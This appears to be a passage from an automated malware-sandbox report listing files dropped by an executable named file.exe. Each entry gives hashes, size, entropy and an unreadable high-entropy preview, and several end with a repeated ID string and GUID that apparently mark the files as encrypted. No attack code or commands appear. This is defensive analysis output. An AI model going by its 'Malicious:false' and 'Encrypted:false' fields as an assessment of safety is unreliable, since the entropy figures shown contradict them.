          SSDEEP:24:gkU178hbCu5e0Kz83VCrLH3+3ftjZea1ckN1gxADh/iTkbD:gkUlgB5ePgFCHHO3ZZeaHz+AEiD
          MD5:7EF5FD5B3D79BE7BDBFF204681CB2D97
          SHA1:02D79AB40D811028341E9F4B18E433A4705B0CE2
          SHA-256:02662B3AC7532135C9B0BD6047550D261E27344298135EBBBE75D81E1E4786FC
          SHA-512:CA6D612BEF75A34B6242F1208327605D80DF96C841D5254A24B1B1B24069B94F8A4C627AABCABDF46833E3DBA555CD68CF07BD0AE29D671C6B1AC6B03E9C5031
          Malicious:false
          Preview:<?xml.@.i{...v..;.b~)..u..lG@.$:tP.x......\.,U....W|l`.N.....6.ht..!....#.......D...x.o..L..F............IY.Q.........8..#kI(.2...#4.[.*......._..'|D.".V.w .I.f....~.+^...2z..>FWT...M..9.'.h.I...............8K..^]..qJ.=.z!...f....=tfA.K;s.R{.`...&{ILW..E....GH;..o......}.n.L..kp....3.tw..........8MR....:.c.../..C.-...f..Nv....LX...5.$2.|.E.......t.)5&....n.'8_9.)q...~`..>P..&........)yV...qk...dO..6.(`...9./......nZU.<._.........-.G_'..0.u.n..1...g..l..])kJK...v..O.k.lN..LQ.tHi."\.A`.....25.^.r..9..)...{+...=C0.LR.........@...-...5.42M...=..JT.O...<C".q1{..zF.R......u|.B..;... l....wE2....^,.l..Sg.......K.>V.h..[.d.I1..Xq.e.`...^....R...v..@ ......5wZ..OnI.(...w......"q.t.+Q........a...0.8"}n..J.d.7.gR..,h...c...Fl.\..........HI.PS.Z/..+.\..P...}....aF..W!.E.>.q..........+..t.]6`.x......Dk..>.R.E...q"."g...R.V....q...A...>M&.z..o..(.L.......4~.....h..z..|IA..*@...A.......d...,Z.].....?.3n....O..~...6V.....(..~fU.cb.._.0.1...%..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):715
          Entropy (8bit):7.667282656529386
          Encrypted:false
          SSDEEP:12:OVN20o/+pTqjjhWwtGTkbQvXBwigR6pu2JvGVwbVV3X59c21Wqq4caQzTuuLUoFl:OHC8qjlWw4Tk8vdNOe5Vn59ZWXt9CuLB
          MD5:7D44B0EDC80E543B9D80C14D907FE35A
          SHA1:5A24A937562E238B2039F3708EFBF3CFF129A72E
          SHA-256:B33800CE4E17D141A40A26BBF75130755DD5F5D289906D74F32F4991C10B1E4C
          SHA-512:7944CA873D50D0E1168FEC08E1585FA3073E73D644162AF4B60A0B68D5332E29D3431A2D4D6E06221DF84BD5B08EE904E79DA51F9A9E32E30036C7113482BBB9
          Malicious:false
          Preview:<?xmlV1N.[`".Y.'.-..I.w(..4s..Ok.k.@U2.....C.*;.......;H.._....`r...Fvc.b...i.....*..g.+PpZ..\...W.2/....q....u{a...*H#.y.4...2.;.J.AV.Vd.>........k.E.....P........Ab................R&.W4.s....c."...X\L.X....{...@..o..r..#..^.n..C98..1.P.....[.FU.%....27N././.+'..V.X(p.o.vcQ.....`5...q)|..l..{Ai.......d..7t........[.._c|..-.2..0.ez......I..vax...4I..B{we.F..."..J99Cf[[.o.z~....u.v.R.jh.4.u$....w..6..C...71.Nb.......A.<......A.X...8...O..(.].U...S.$..G...3...........1..[..[.0....+..7.....Y.J.G......L)..E.D..u.+..S.8.....xG;..40y.G.p7....}G..&akP..>aH....N..d.FY.....E..X....z.N....=~-.........1..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1398
          Entropy (8bit):7.83012028588644
          Encrypted:false
          SSDEEP:24:eoG4/VNPVAdqVTtAgn1/FC7sXMlKqbXSrzZgH73EHXzLmXxkkViTkbD:eoGIVnbr1FByKqbXIzeUHjiXx4iD
          MD5:4870BEC89A9B7698D34505A71E9B1BE6
          SHA1:755D82D83F2F46D04F9E732A8E74014994164204
          SHA-256:077B6E7954B896E008DE3EF51B447736317EED055A593C6E2D3B0B61D3B9A5EB
          SHA-512:674A8535EDB2C2972C787EAA521653BED9C5B11BC341B0EC5E61BD9C2AB1DA5E1F28FC28B82296950CFA0CF143CA163920C5F6BED0B30F787AE5F3FAD70801EB
          Malicious:false
          Preview:<?xmlo.\)...o........9-.R..6....._b.S.....p..w........B)wk....EF..J....-8.....B.2TK..........d......M.\/.vGC.(.Bn..t.J.D..T:......@....e[&2o.g..&..1t............?.._........2...4.B...IC.{...G. .AQ.......T..#......p.C/..".k.3.6#-.~..4-...7.<....j$E3..Z...Oe..E..7..H..l......;..@..F..|...v....LX...=.....fI..H..|Ejf..2j.p.F.f.0@.......7A......I......p......a.......4.v:....#. ~.H...6~.-~=.P#.F..V.CG.2~.$$..x..6.c..7...q..2..<4....t.5U.4..h......+._.Y.r5.U6.....Z...2...X z..kX.]V....>..h...6 ._.......^Tb...*.../5......K..k..7 .<a..E...O.......YcCN.2.7.pv......_.<8V.&..m...e.-..3.Y.....D.....)PmNo...4...;....Q.....[.7.d..I.4UiC..7.L..&Y...9bG.d_V.<...._..................H.h#R.N.O...9.{q.^v.9.kA..`..m.$n....gR....#42..,.1~..........M.<.?.,!f...R...b..~..ah..{.EZ_.)7..}WB...l^....2.E...==.>....[/$..0!1Y...y...s`.GS=..K.ECR....7./...~.....p.bv-......g...h..[$..aG.L...$.9....c..N...~.v.E,.....5.......g....|.c..,."D....FU%k....Fv..?.$...i
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1008
          Entropy (8bit):7.784928473483372
          Encrypted:false
          SSDEEP:24:eKtDydHXOASm9qUSQ8klBn3vpO7U7of6VsOw6ti6Vojn9BOiTkbD:xIHXOqJSQ8knn/L7oaTJti6VoBdiD
          MD5:21623A4F6E8899604D48EEED6CAFB575
          SHA1:173B9A6874D25EA3A51D4367FD58DEF5D9B14B0E
          SHA-256:D3975DB196B5C762A67D411CDB40779ED139ED7B940E0897863E183EA377BF03
          SHA-512:551A373D3F3C6C69E5EE310464DC948919A633803A5A32FF88CCE4569DD7105A5983E703E1A16D680B07E765314059A86A37D4805F2081978DBE91026F4A2C67
          Malicious:false
          Preview:<?xmlc.Z.,..-$G.uDJI.... ..-@Q.(.i.G..V.;.......2...i......7.O.E......v..~r.[...n.......vxk...0.U2o8$....i.Nwi......T..j.8.....G%.5...R4..La.. m..9/.go....X....4.30....u.^../A...N?E.L.O.h.k._#r...Eu..U.J..{&.=.[.C?... ..7D..l..5.......J..X7...*.k..|.....S.+H...%....H&0R..._.>.P...7W...l..L.C5..}.?I&GR..5.OW..~.u;..{..|...9..3.4:.!.....k.......3..9.<U'.....=...p.]..r..p../.:d.J^*7..MMg.. .....d..1.........i.%.........`..Gu.&..g.~.......d.2.s.T3~.J.m......'p..eE?.uT.|.RAN....>.d....X0..<.....T..)..E.}.5.[,..+..u.....h,...t.H..?b.....=...G.E.*ez_..0.........M...Td..yI..7....2.;..y..gv...N8.#..U.9.[.1..a.l....h.L4l..;....~.....';...r....".h\.T{Hjd.._.t...../.{.....^S...........D.o...>.!^g..El.'.......8...?Rk...jt9........'.....5d...1{@..U.Tp}3...Z\h..2e..6..p...V.........Q..b...<}l.=yY.Ez.F...&..yO..^..a.<...E.9......1.+G.e.n....E.!V.x..Fyr...z.4Wv._.V..a!.6.[.c`.a^o....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):719
          Entropy (8bit):7.705610271421749
          Encrypted:false
          SSDEEP:12:gjAAdKt3TSjSLmPwjBWNZ9+CaW86CQzT3V9ltUHpjK6kj1mTyx6n6l4AbnleI/iq:sAzt3u+L4wlWPxoU6tKpOcmAbnlHiTkX
          MD5:64D88E511B582ABF26801045DF93394C
          SHA1:7FCE7E80D20CD16AB69F1EC0130C527CFDE37397
          SHA-256:627D5AEA7A833D56BDA6243E72F61E43513E10EA05E6DB180F85FF6A8FD5530C
          SHA-512:DC990CF2E6CF4FB1D8EE2065F7D21E121DBDA7241E558020794F8C5A683805EA6E5878D4B54EAF33A3B87154A71928C28D3E2B6B1C80398DB96332361BCABCA8
          Malicious:false
          Preview:<?xml......s1.6Wb...K.....Fy..(.H..C..n...;nh.B..dr' .^..DA.6.@{Q...=.rb/k....A...k..!.8..._.A.;I(..%........E>....W.....A2.D2...cMM.HEJ..S..$..p|.........9.We....x|.X.p.i..=..*.R.:...8...TS...N.......).},/b.2.._.D...Ns.D.\.X.?.z....x..l.*..7c>b.siq...r]...:%z.s.Lu...j.>A..>8...;.I.....y.K+..A.X.!7....Q...a.H.......P..........`.1,...'...z...]\_O.%.c....a^...xqDf._Q0T...9..FDV.r....%.........L.<..Y..J..E.Ruof%/F.......N,......0\.9..])..I.xf*...<....[.=..!=.h...q.T...VCc..D..bf|.7M(+.....J..\7.....o..f...Q..Q.0.I..B.z:..;..'..8(iI.b...I.%7n...w.0.N.G...50.pe.t&.......%..].m..u+.^.....q.....dq.kJ.}.I....3Q(.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):793
          Entropy (8bit):7.743279841048161
          Encrypted:false
          SSDEEP:24:GqCE7QVebqqBZqUt8tACImNMQhqdR7jYdAUA1QjPAViTkbD:G/7obq1Q8tAUNMDRUsQfiD
          MD5:00D7C9E1787C3A3FE969B5976FDD2EF2
          SHA1:67396791A335B45F2C683ECF7646AF987DB44CAB
          SHA-256:876E0296EC8D7DFCA09CE42E1F089AB7511685220C9E825D0C3C58742B4A09AA
          SHA-512:1496CC7FB7DECE0A8BB69DA228B749DE6A2F58101A33BA82E0A3A692AF816C6967AFA124A37C9348841D79BAAFFB9AE3FA4212705C0DB73DE44B2755241C616C
          Malicious:false
          Preview:<?xml.S|..;./$i..1x..k...p...U...*v.LO.....*.=.Lzf...e.|....e.......uf..w..;.........r%+.&....!..X.%.w.]....)X...E........B]LF[*6.u./..5.Z.........9.....a...2.*..r%d...gC.....s..u......Z.....uF....^6.v..f.4..dH..7....k. .[.v.{3......T.U0.Q....o...B)....,5.W.....b......+...w.7....Y..^........[..R..m.8.m!L.;r.....>.HL.Jf4.....n..)...D..p..2BY.q.-....W.r..(..+.&.8Z.qj........j...s.ll.6...."/.4.,....X.._x...w....N....;=.....:..8...../..<;..1..6..3.4.AQYT..W.h/..#.,.8.x....(....6.^`..{..Zs1@....f.+[W...."..-.U:.[..g.....B...!}.#.A.A.t.3..+=6..8...e..a.........{...wH|.N$X.M~.d.....C".._..V.i.0Bk.lkc...7..~..Mo...|&.ec"T.+..../...f......2._[e.=..]...7.@..I....b.......,n..U.....Or6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):761
          Entropy (8bit):7.719821703250198
          Encrypted:false
          SSDEEP:12:0DG9Q8LMgpWpsCIEwhTPCJyybW9ZqnewTpmIu9NOEtO4yZOz4Yq4QFxTQixpZacq:PQ8LMeeIEotybW9WTpmrI4qOz45zX0iq
          MD5:C7E2B8787D837B694ED68B5D58305E7A
          SHA1:B41B2329DD323E2069168DAEA3FE716914F023E9
          SHA-256:227BEE8A1B486E896531AB734F851E58CAA2BC0600F44DA8C2D86876A359521F
          SHA-512:C815D8704ACA769D3F1777A7C9AE3F05F05A008D11524BD6117991D4444B4DC204C65C2C6EC6FFB1C0A3ABD186FE3A672A9C4F69035796BE242FC078F036AC69
          Malicious:false
          Preview:<?xmlI;.]]...O..JH.E.....m..K....U.~...9_.[;.(".N.R........Q.I.t.mC;w...nXN.m*.%^..p.'......*p...q........7..f[........c.C..r<@5e..@v,Y.k.&k.w.=-.Z.+...~.V.01^[b...p.k.8.[....x..Pa...:.i ....... Np..nZ..h.z@.0.qs.1z.R.....F-.J-S.L&/...l.V,.8..,..Tv....R.......q......W..N..x..7....@.........JD.p.bV..D/.<.t.RE.0._0...f'j..8._.g#.....k../...n....lY`......P<...kY...P...YC.b......<......+. .Ls..P#.|.ETG..*5.....7{.3.......;....N../..b....Ia.Cp...B.f{....D..W."|g..bnb.Z.....$.5....\....|.>.@..h..T.(....'....08.....?t5........x7D.......q.B..x.<4.(zDGe..Q..i..u.4..O.4K.............n.fA.w.}.*.....X`'.H.3.(..L$. .>.....H.E.......W...~...UEO..>.5...V.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1306
          Entropy (8bit):7.836194191871631
          Encrypted:false
          SSDEEP:24:AyJU/cyurWlvOY/Xy1PVHuqC7ify24Y19c8+Kl58L/Dco9xzciTkbD:A6Uwi1OY/XyZC7iaVY3zL58L/AahViD
          MD5:02AA3BE0098658655D972B171E732132
          SHA1:DF5358D75290CFE22CC9F8426C905D82CAE8645A
          SHA-256:3BCFA21BCC90426E4C46A6A7AC2D6AB8A8AEE4AD86AC65ADC746D1DC5EBD512E
          SHA-512:FD6AA68BC7D2A66AB11F6F74791E92F3D1D489B34698609D18A8A00025FDF83D6E364C9A53F93A7E6BE8A417F653A75F463E7C36586FE5BB27F3763466CC1F55
          Malicious:false
          Preview:<?xml....e.Y_.\......l8.jyM.<..B...Ve$...Nls.duh..g.:.#...mh..&"...S/Wr..kl;...*...NF..t%lz...5..!.....a.I..x...m...x.2..}t..6..z-.F1....|6.:}U/3yk}.._..O...0RCWZ...3.._.M.[.x...,#%.?.....fw..u....?..BO.f..O..L#./M..Q:.@3.~n.J|^.b...O.......;.!.W....P....u...~.Zz.d.~.T_#l.?....v.e..w.um.)s....z.0..C.+....w.]..e.R....VI.X...`.x..(J(.^.-..5...?.\....h.oyT..%*(.0_cD..t..&.0_...u?.vQ.).2:..M.yi.)....(|.....J.;..._....B.e.-.....|.z.e.-...R!k.{#p.8..O....EKrE.i0..)C.\!..d.........5..S..v..s.(...H`;.B....b.B.t7*S.......w...(....pO95..?.~.'V...M.l!.....2E..|r...JA.x.*..{y...)J.K...w..+.f.~X5r..@.*9.....Ay..N.V...z...r_......V.Z.T^.....U......:.0......Bv.Z{.$....@...=...-..d..:...qR{n..;.....[..<\4]....99.(....]...p...<.l"$V,.w.Hx!.........iR.x.B..!.{.c..iq.Oy...|...Fn+=.(.."}!d$f...@;t..."r\^.0V....f..S....}4rl..z..9.*7HQw*....&f...r..T_.9.')....DM..O.X..).>.!('....]....`.....9qx..\U%....M......z...J^.X....f....:....]..(.hI.<...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):4285
          Entropy (8bit):7.957100045912068
          Encrypted:false
          SSDEEP:96:gllEzDfpnRr3e5PZBH5uNgHzYxTxAh7rey8N9LIdQAG:IlONnRi5BBH5ueHzYTx6myO9LIdQAG
          MD5:70B1B9CAED20951D650D5D9B6ADA9B5C
          SHA1:AEDFA095FE1B3CAB985A166C60952C1B4FB14BB9
          SHA-256:0B8971A0C2CA3654AFE8FD5EC6DABBC154D7E18D32BEADF8D81E73315C960D35
          SHA-512:1656D7AC903EAD5B01CCCC63809FFC83451075D4BF85232015F75069547A028D5AED5CE8DA41BBFBAB7FBB66DBA581F350B5B3F10CCB6C9513A40B1D52ED5477
          Malicious:false
          Preview:<?xml...-e..$.J.\R)*.S.....w.m..?..Q'._.. .)..;..p...Et..l..........|..uXzJ....7l...%...4 .W.=..4)#......cS...K,.e....!L..LW...p....k..?.V..1...c.&w.0.l.,.....}@..B9Y....:..kh^.)..X.R."..<I.V...m.....a...I9r.,....A.Qs./Q...I..../.)x).X..i.|.b...K...p9.u.#8......O....1I.S(....r....*7.\..[.)M...,[d.0ZO...Vw......#....x.W.........../{...3............sI.>....l8...........y^..[D..72..SI.b/K..6...P.m.8....lR.|..-.........B..5.zX..o..$C2.o...Dd.T.J.j..Z....v,.N.\%.N...z.U....U0.....y..T....q..........v..,t.Z;..B...6..nv........a&%XR..3.S.v.N:...r..2.EZ%m(.&..S..........h...%`..x1...Y......+.I...T3+o._.".(..0....~.?r..C.F..f...-.:..OT9'p.x}.h.+Cbo...R..n;./A.n....G.mu...Z+.....M...*.XB#.[....d......1"...K.......C]R..H.b...WlVD.Y.d..ioD-.la... .....G3..?.W.3.d/......Z..i...+..oG..^#..D....L_...f........|....P..B.dTa~..PF...t.kW....mz..y..Z......{.).j...c.[v..L.)_Q...R~7pb.bh....X.;tz...nWGe.g.EQ.._6...."....ZFZ<..J....Io..s".3{..%L..N.3.[.....3..g....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):854
          Entropy (8bit):7.731598513481275
          Encrypted:false
          SSDEEP:24:SFgWtK6lmGcwS7EYBDCY2wE4KsCtPQy3xwEdmiTkbD:SLK68GCEoGY2j4KsCdQyhwEdDiD
          MD5:6EEFEE7CF44657F8364E5EF993E8940A
          SHA1:B079865874EE415B671A0616AB1F61BDDFEB8954
          SHA-256:B734861CA8E00B5E8987ED0D87F56376F3370581C502C15ADE757D04FB6C7797
          SHA-512:0D00124EDA38E6228EEC536E62BEC055AA8B6D1B444EA1FF93FE4DB8023595F2544D2AEFF3A1F4CC7DB3AF3F10C6FDC20A75D0E6C4CE5D58293D95439B9B87A7
          Malicious:false
          Preview:<?xml.$>b.....3g&.XSS5M.b...).bb....T|...4q..../F...D$.r[.<.^.H......~d*&.....5.R/.2o........&.2.Tj.6....BG.z..<....A'..T..uK.Q...`.s..L........p.S.....t..;..^.@.%..OPJ..=....f-./J..R.I<.j..N.....g.l..`B)6.._.....P.i.6...f.62J(.+t..5....,".?..8....@Kua2.8.U...ui.zT].a&.eX...K[y.jc~..2\F.r?uQ....P....<c.}..l.^Fxn,.B=*....'Q..6.]i9.S8...du.0..[../..\.IOk4|$.....9.rLk.A.)j!..*....{d._...oB..|..M,..\Y. F.i...ez^."Q..h.go.K...~........!/..j.).p..2......P...WH.e....>...n..A.,.P.....y...g..sU.=..^#....7...Eu..T...w...w...)c.\.1z....4.....4N.....}f<De.w..^..y.sR.......N....:..~..~.*..G...z.....xu...n...2*o.6].....+C.]..ae;*.`.t.2?.s.j..>E....~{s..D...~_..R.}7%.pA}.K;jxp.*..i....q.......c.-!Y)..I...jt.{...V..t.p4..u..T._z|f.....-p.G.....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):929
          Entropy (8bit):7.790400048761336
          Encrypted:false
          SSDEEP:24:or2TteBGw9yvYsz0Fcq5S7+/G+Epk/ZKDO117JeUBiTkbD:YD1szE50VpUZXL7QFiD
          MD5:4CCDB20BD22982613289FDB785618C42
          SHA1:EA471DC320729E6707097E145C2CE90F4D77E49B
          SHA-256:1AEF5E10BB957D71995FBAB753990D074B886BACB03407E278120B6F63A8FDAB
          SHA-512:5D1BAE66EC07F629888165AE0AF5A1724A2EA39DE10FD851DFF89D9F48D49329B2DDE0ACEC816FB4C57B4C373AF0E893FBA90B4CC5047FA5551D60B88E9687DE
          Malicious:false
          Preview:<?xmlU.../.@vsZ.j.'.R.`.^.`_..w.,e}&....'*n.%6...n.#9.....I.k?.F;.\...J....f........a."....n..h...{.%]|;.L.xu.-| ..D]......6.._}..{...Z.t...... ...w.Hbw..../..,....~. ...v..W.(.&S.8N....Bk.I....H....A...@.{...R....>R...K..P.z..`F...r.=.X...E3.pyR...fZ6...q.H......UN...ivlY...........<"M_..[|@a.6.6!o6=2x..Sl.....L.y.#......n....U...?..2..._.,...I.I..n..{...l.h...j.#rK......(l.[..Z.14.)......4.......M../.5f..kx....G...>..E....-.M...M.r(.p4.D5..J..........t..C..]..L.N.V....;mEA.x.a..M.Iq..O.I..v....4B..E_+.em<...-.!...(...JC.......aT;../....&.&.J.A.7q.......Z.....aU..Qn.p.SUAf..c..`..W..D.B..pU..T....@.]ln.....Y0.?@.M...P..H.....'.]~.#3MA..4@"...|.:d......i9.4.l..A)D.....I.cZ7....C.u.....9.).......H.Q..T..(J...e....oU...n..H.].Pl7...(xL..b>.k.8.,$Y.....}............h..&.f...c...Y....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):722
          Entropy (8bit):7.686205559590029
          Encrypted:false
          SSDEEP:12:S7OPEFGtmXL9fNDb6z67+6OuOyEWxSOveLRpRpBoRJumMvHf6d/ixpZacii9a:Sw2j5Jso+Vu1EWxSO+pLBmWf6d/iTkbD
          MD5:3B9C067B00F14F9D30E51FBBB173DEE7
          SHA1:AD0229C3D7949E814E9B0AB761C38D33F575954A
          SHA-256:A5122C658601E6628F22E9121F86B5C3721F34E6704B048E103E4EB1731E0B75
          SHA-512:5F26F84244FFAC967B7EC95E4501AA736E70B4BA2326A43FF13ABADE44890B0602C7301FF278988B3AB7D8A7F799E83EA66D84AB314A0F5362756BE09D1DC3A5
          Malicious:false
          Preview:<?xml........y!.z.,....'s.1...Gz>Z.9"[>..-....}.?7L.05.g9.....).d.(bw.n..^0.!j.7"f..o......M.J^..l...@kGp.. 4.@9]..#...+..-..`..S...,....Z}...Z.u.W.zL.guh..5.(.U..-".>.#!WD.B.D..+...tL\...NQ(..,;..=!.....7.^B..C.bU{........=.~.G.D87.=9..B.*.....;j.9.!..$,...r...!t_....D.I1Iat..sW....i..jpfs...k.X...Q..e.....`o.<.c..hh..z...iL.\Y.n*.G....sM..U..3......I..)&..d.|..&.Y.3......U.. .......1..R......6..J....$rq.SnGN}.B..^v.E......z.x>..@G..YQ...!..T(<a.z.{kS..C%...2...wT..t3.Q.%.;H...r.i].|..]t...2...+j.......9...v.b.+.....{...l.2.Z".j..af......5....".U..e..j3.H...n.]2..W.....mt..Q.C0.v.....).R.`........1.VMa.......Pr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):935
          Entropy (8bit):7.777697289822939
          Encrypted:false
          SSDEEP:24:zvPL9hubwaP8PkWwBHJuWkoVMTE13AkrzgfJvBWRMiTkbD:zXLeP8PkTBHJgo+TE9ghv0jiD
          MD5:B2611608303E48977CB19B62726AE263
          SHA1:FC0D4F7988505E243FA4F40A09A9E8057A04F0FC
          SHA-256:67249605B284C1834153A82E2C8267E34A6255CA0787B6241FF788507ABFD88A
          SHA-512:09B8D256D24309BA07E8B5DA839E258C69C51DDA777C9547C8784471E958091E028C3FCF20EE3D5DFFAD69B6C2902828FF36B92A28A1D85457854DF95E40EE37
          Malicious:false
          Preview:<?xml...Z....U.fm.....F.k.Ko.q....3...C.Y..+..........c0.....E...Z|.aT.*y.Du.W.].......<d0...-.....I.%...+.Z.._f`.L.L.4.acP.+K.RZ...l.mW...~....@........3.!;....0!.d.......8.2....$.Hq..........C.Ha..$+s.c.../.,{.y.]...|..[..>...@r..<...0..T1..C....C..r.x..l..q.F..U'..q.....e.J...1ih..9.3.z..S..0k.8.0d..U..8.BX.q..B?....EA..9<..c.O....vaw.T.....^t...e..{..V...7R...a.....]..x(K.'...........LC ~.k..CM..D.I.....DP........?s....'y.4.F..&..km...G.........W.Z.>..r....I.]......gD...B.......Qa^~%2.^a.0.....!.z.t.|sW..Q..)G..^&H...'~.K[|..S..;...z)...e...E...;.<."V.f:=.....z.b.&..p...'x..bv...k.Z.u.&......w..|$.[_.....1hmx.A...3M....M...M......&d.D.....O.{.m}I......5.........;.....^....*.`B.......s93}...`..TEJO...W\.a.)..^. 6...].O.....V.~.........>.7..C(.8...y...(...*9Dq.....r..|x4lZ.........M...H;.3G.._.B..qQ........I..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1357
          Entropy (8bit):7.850019366680244
          Encrypted:false
          SSDEEP:24:BtC0YehWdcKvXnK5LLw33leTTR2gHtI9MrpU3GJozFRRMKoj6e2E8piTkbD:KchWHXOg1exvNEqNJILpojF3iD
          MD5:5100FB8C47D2F0450D603D8F32D8B98A
          SHA1:AD2D85A28D6AFB59B66A7E18F6A4EB1D8440A4F3
          SHA-256:4EEB5D620D456E9FC01DBD7C46BB9EA4AC46326D3C7BDE514F3E5A1A1DA1DB33
          SHA-512:A457D5A8318334A16D4940B6EB9D64B900753F8457CC286511C929F0744001812F15525D152A20CBFD5D91DC01A2154F0D82EF0D021DD0F94368634843A34087
          Malicious:false
          Preview:<?xml<.......5A...0....$..#......\&.m..F.(BR...#.Vj.GsT.s....&lS.F..?+UFv;..~..J.A..d..K?....R.!r..e.%.a.7...[... ......(:....M......Td.!.W.... .S..Vy..R..5...).\U2.^-.1....Yy.,.....6jRH%.L.D.e4.%.q5~z.o.V.B...l...O......].?-.s...R.Ps&.cV.+3..........}4.M..?....(..f...a.H.....oyaA]5.......?...c..XypN.Bv...e....i..J..O.....(.......5.......$..f.u......*.....h...s.-.?..v#m.=.............^.+..s.....OO.=..3..,.>.nS".4.GF..p.8H.......Gm... .&.........r.S..C..h....)M.P.Y.j......|(...h.5g..zI!0...Z..q..6f....5...!.g.17.....\Y..Caf..^.....1..]X.Zk..a1Y...cS.BV..U.z.k.f..0.X...s..{.n1.ryX.....O....f... W$..T..........m.R........X.X..y .A...b...p...X}G.././(...a.P;5XHw].Tl.X9.<......f...L .........l..x'........kL....Fe...p`.<...7)...0.~.tnL.n..2.W.9.*..P..I..v|-.pvk".A...V.F....W..`.C.U.{R..........u.<k..-h..s*)....#.....W..Z{<X..,.}...({.. TD.z...V.h..@..yd7?.3.f).t*@...x'..R....Y........nq.F.."...F.........j.p...cdF....M=2....A..rj#g.E
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):7.820902631417601
          Encrypted:false
          SSDEEP:24:+SkqRBF80MJX97ysKQp3qCKZFQn3UCx5m5T2AOl8UrdiTkbD:L1sX9rKYnIFoUCx5YOupiD
          MD5:7917A5FE525BFB9F24DA10BE04780968
          SHA1:F95882C3066905CEA5885E8587E224785512EBF4
          SHA-256:6CC269CEC9B5C668BEEDA0353E72DD4D9178F74C8AD8A1F0F939A23EAD19416C
          SHA-512:CD694ABA4F7575C471B8EBB3189E6F93C41B6B1C26E6EEDA55015CDE55D26DBA34561572F2960EF26F31B0AC675694E2A51C1C84FB7A20CF47E57052A4B064FA
          Malicious:false
          Preview:<?xml...bLvCb....nQG.5.V|..)D..J.]....g.(R....W..`.)v....e"..G{.e.a.;..~Cp.;....<r..*ol.....y@!.~....5t%..G)x#...'.Jk...k.=Q..(U .1#...;...$&...f._.@.Z.S..lR.E...0...+....!$...t.'./...6....x..&.p..z..*\=..b..Y...7.%.'..G../...g..9..W.6..<.7.H"q.d./...s...!./...K..T..W.0P6we...>`.......E.O..!fa.l7q/b.Q.=S...<..&Ee.._!.~Bu...w.6@.k.X..x.....O.e..a(..q....c.t.....k&B..D|2.N...o).u.[.n.C.-j$...|.]g..7Vh...ON.b.'.bz.*........d...^8.S..).)...fD.......w.#.VA..SuS.d$..EC.....I..(.0:..c.m...Pn.)...^........{...j..F..x~....$.V.am..(yK..R...8C=.LU....g.^.{]...b7..dy......Io...BO0..i.;..|p.......#.f#"nD..>.......p,..K.o.u%..-...d........v0.V1....2..)p..W$w...8hS...Xs...MZ..+.[. ..4j^...{.K.Z..7q...N.....c....l..K..a.JI(..?<&......=..$...Uk.aT.t].....f.4...5junQ..."G.Cx..%my..:.........$.*...s.Wtc..v.....Q.H5w`@..r.[.U.>.Y.P.).jk... ..9.5..T.Le(D.8.y.B]DV-.c.`.u..\...!.v.....,|Z.$.Z ..c=...._r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):943
          Entropy (8bit):7.774494836286612
          Encrypted:false
          SSDEEP:24:2yiZNhyfDC0Jx5LbARIDJGyspyLUoE1CjZ4nmSKTxU0/2iTkbD:2lNCDC0r5nACDJGXkLUoE1gZxSoxUeiD
          MD5:50F9C442EC132F32606B1DA26768FF28
          SHA1:162EAC75B8936DAFEF128EF056377A812E3D4BA7
          SHA-256:B6242202FA9620CFA067589FF3AD6C60ECDA6DC445AD740243563EFEDAF40B28
          SHA-512:BEBAFEB4FBCB1ECA5E28B8F66AD4FA59AA82FFD67069948D15992EFC9665038E98501249CD1B6C758B15C2088F247C40EF6C693D334809E6E18834693D419255
          Malicious:false
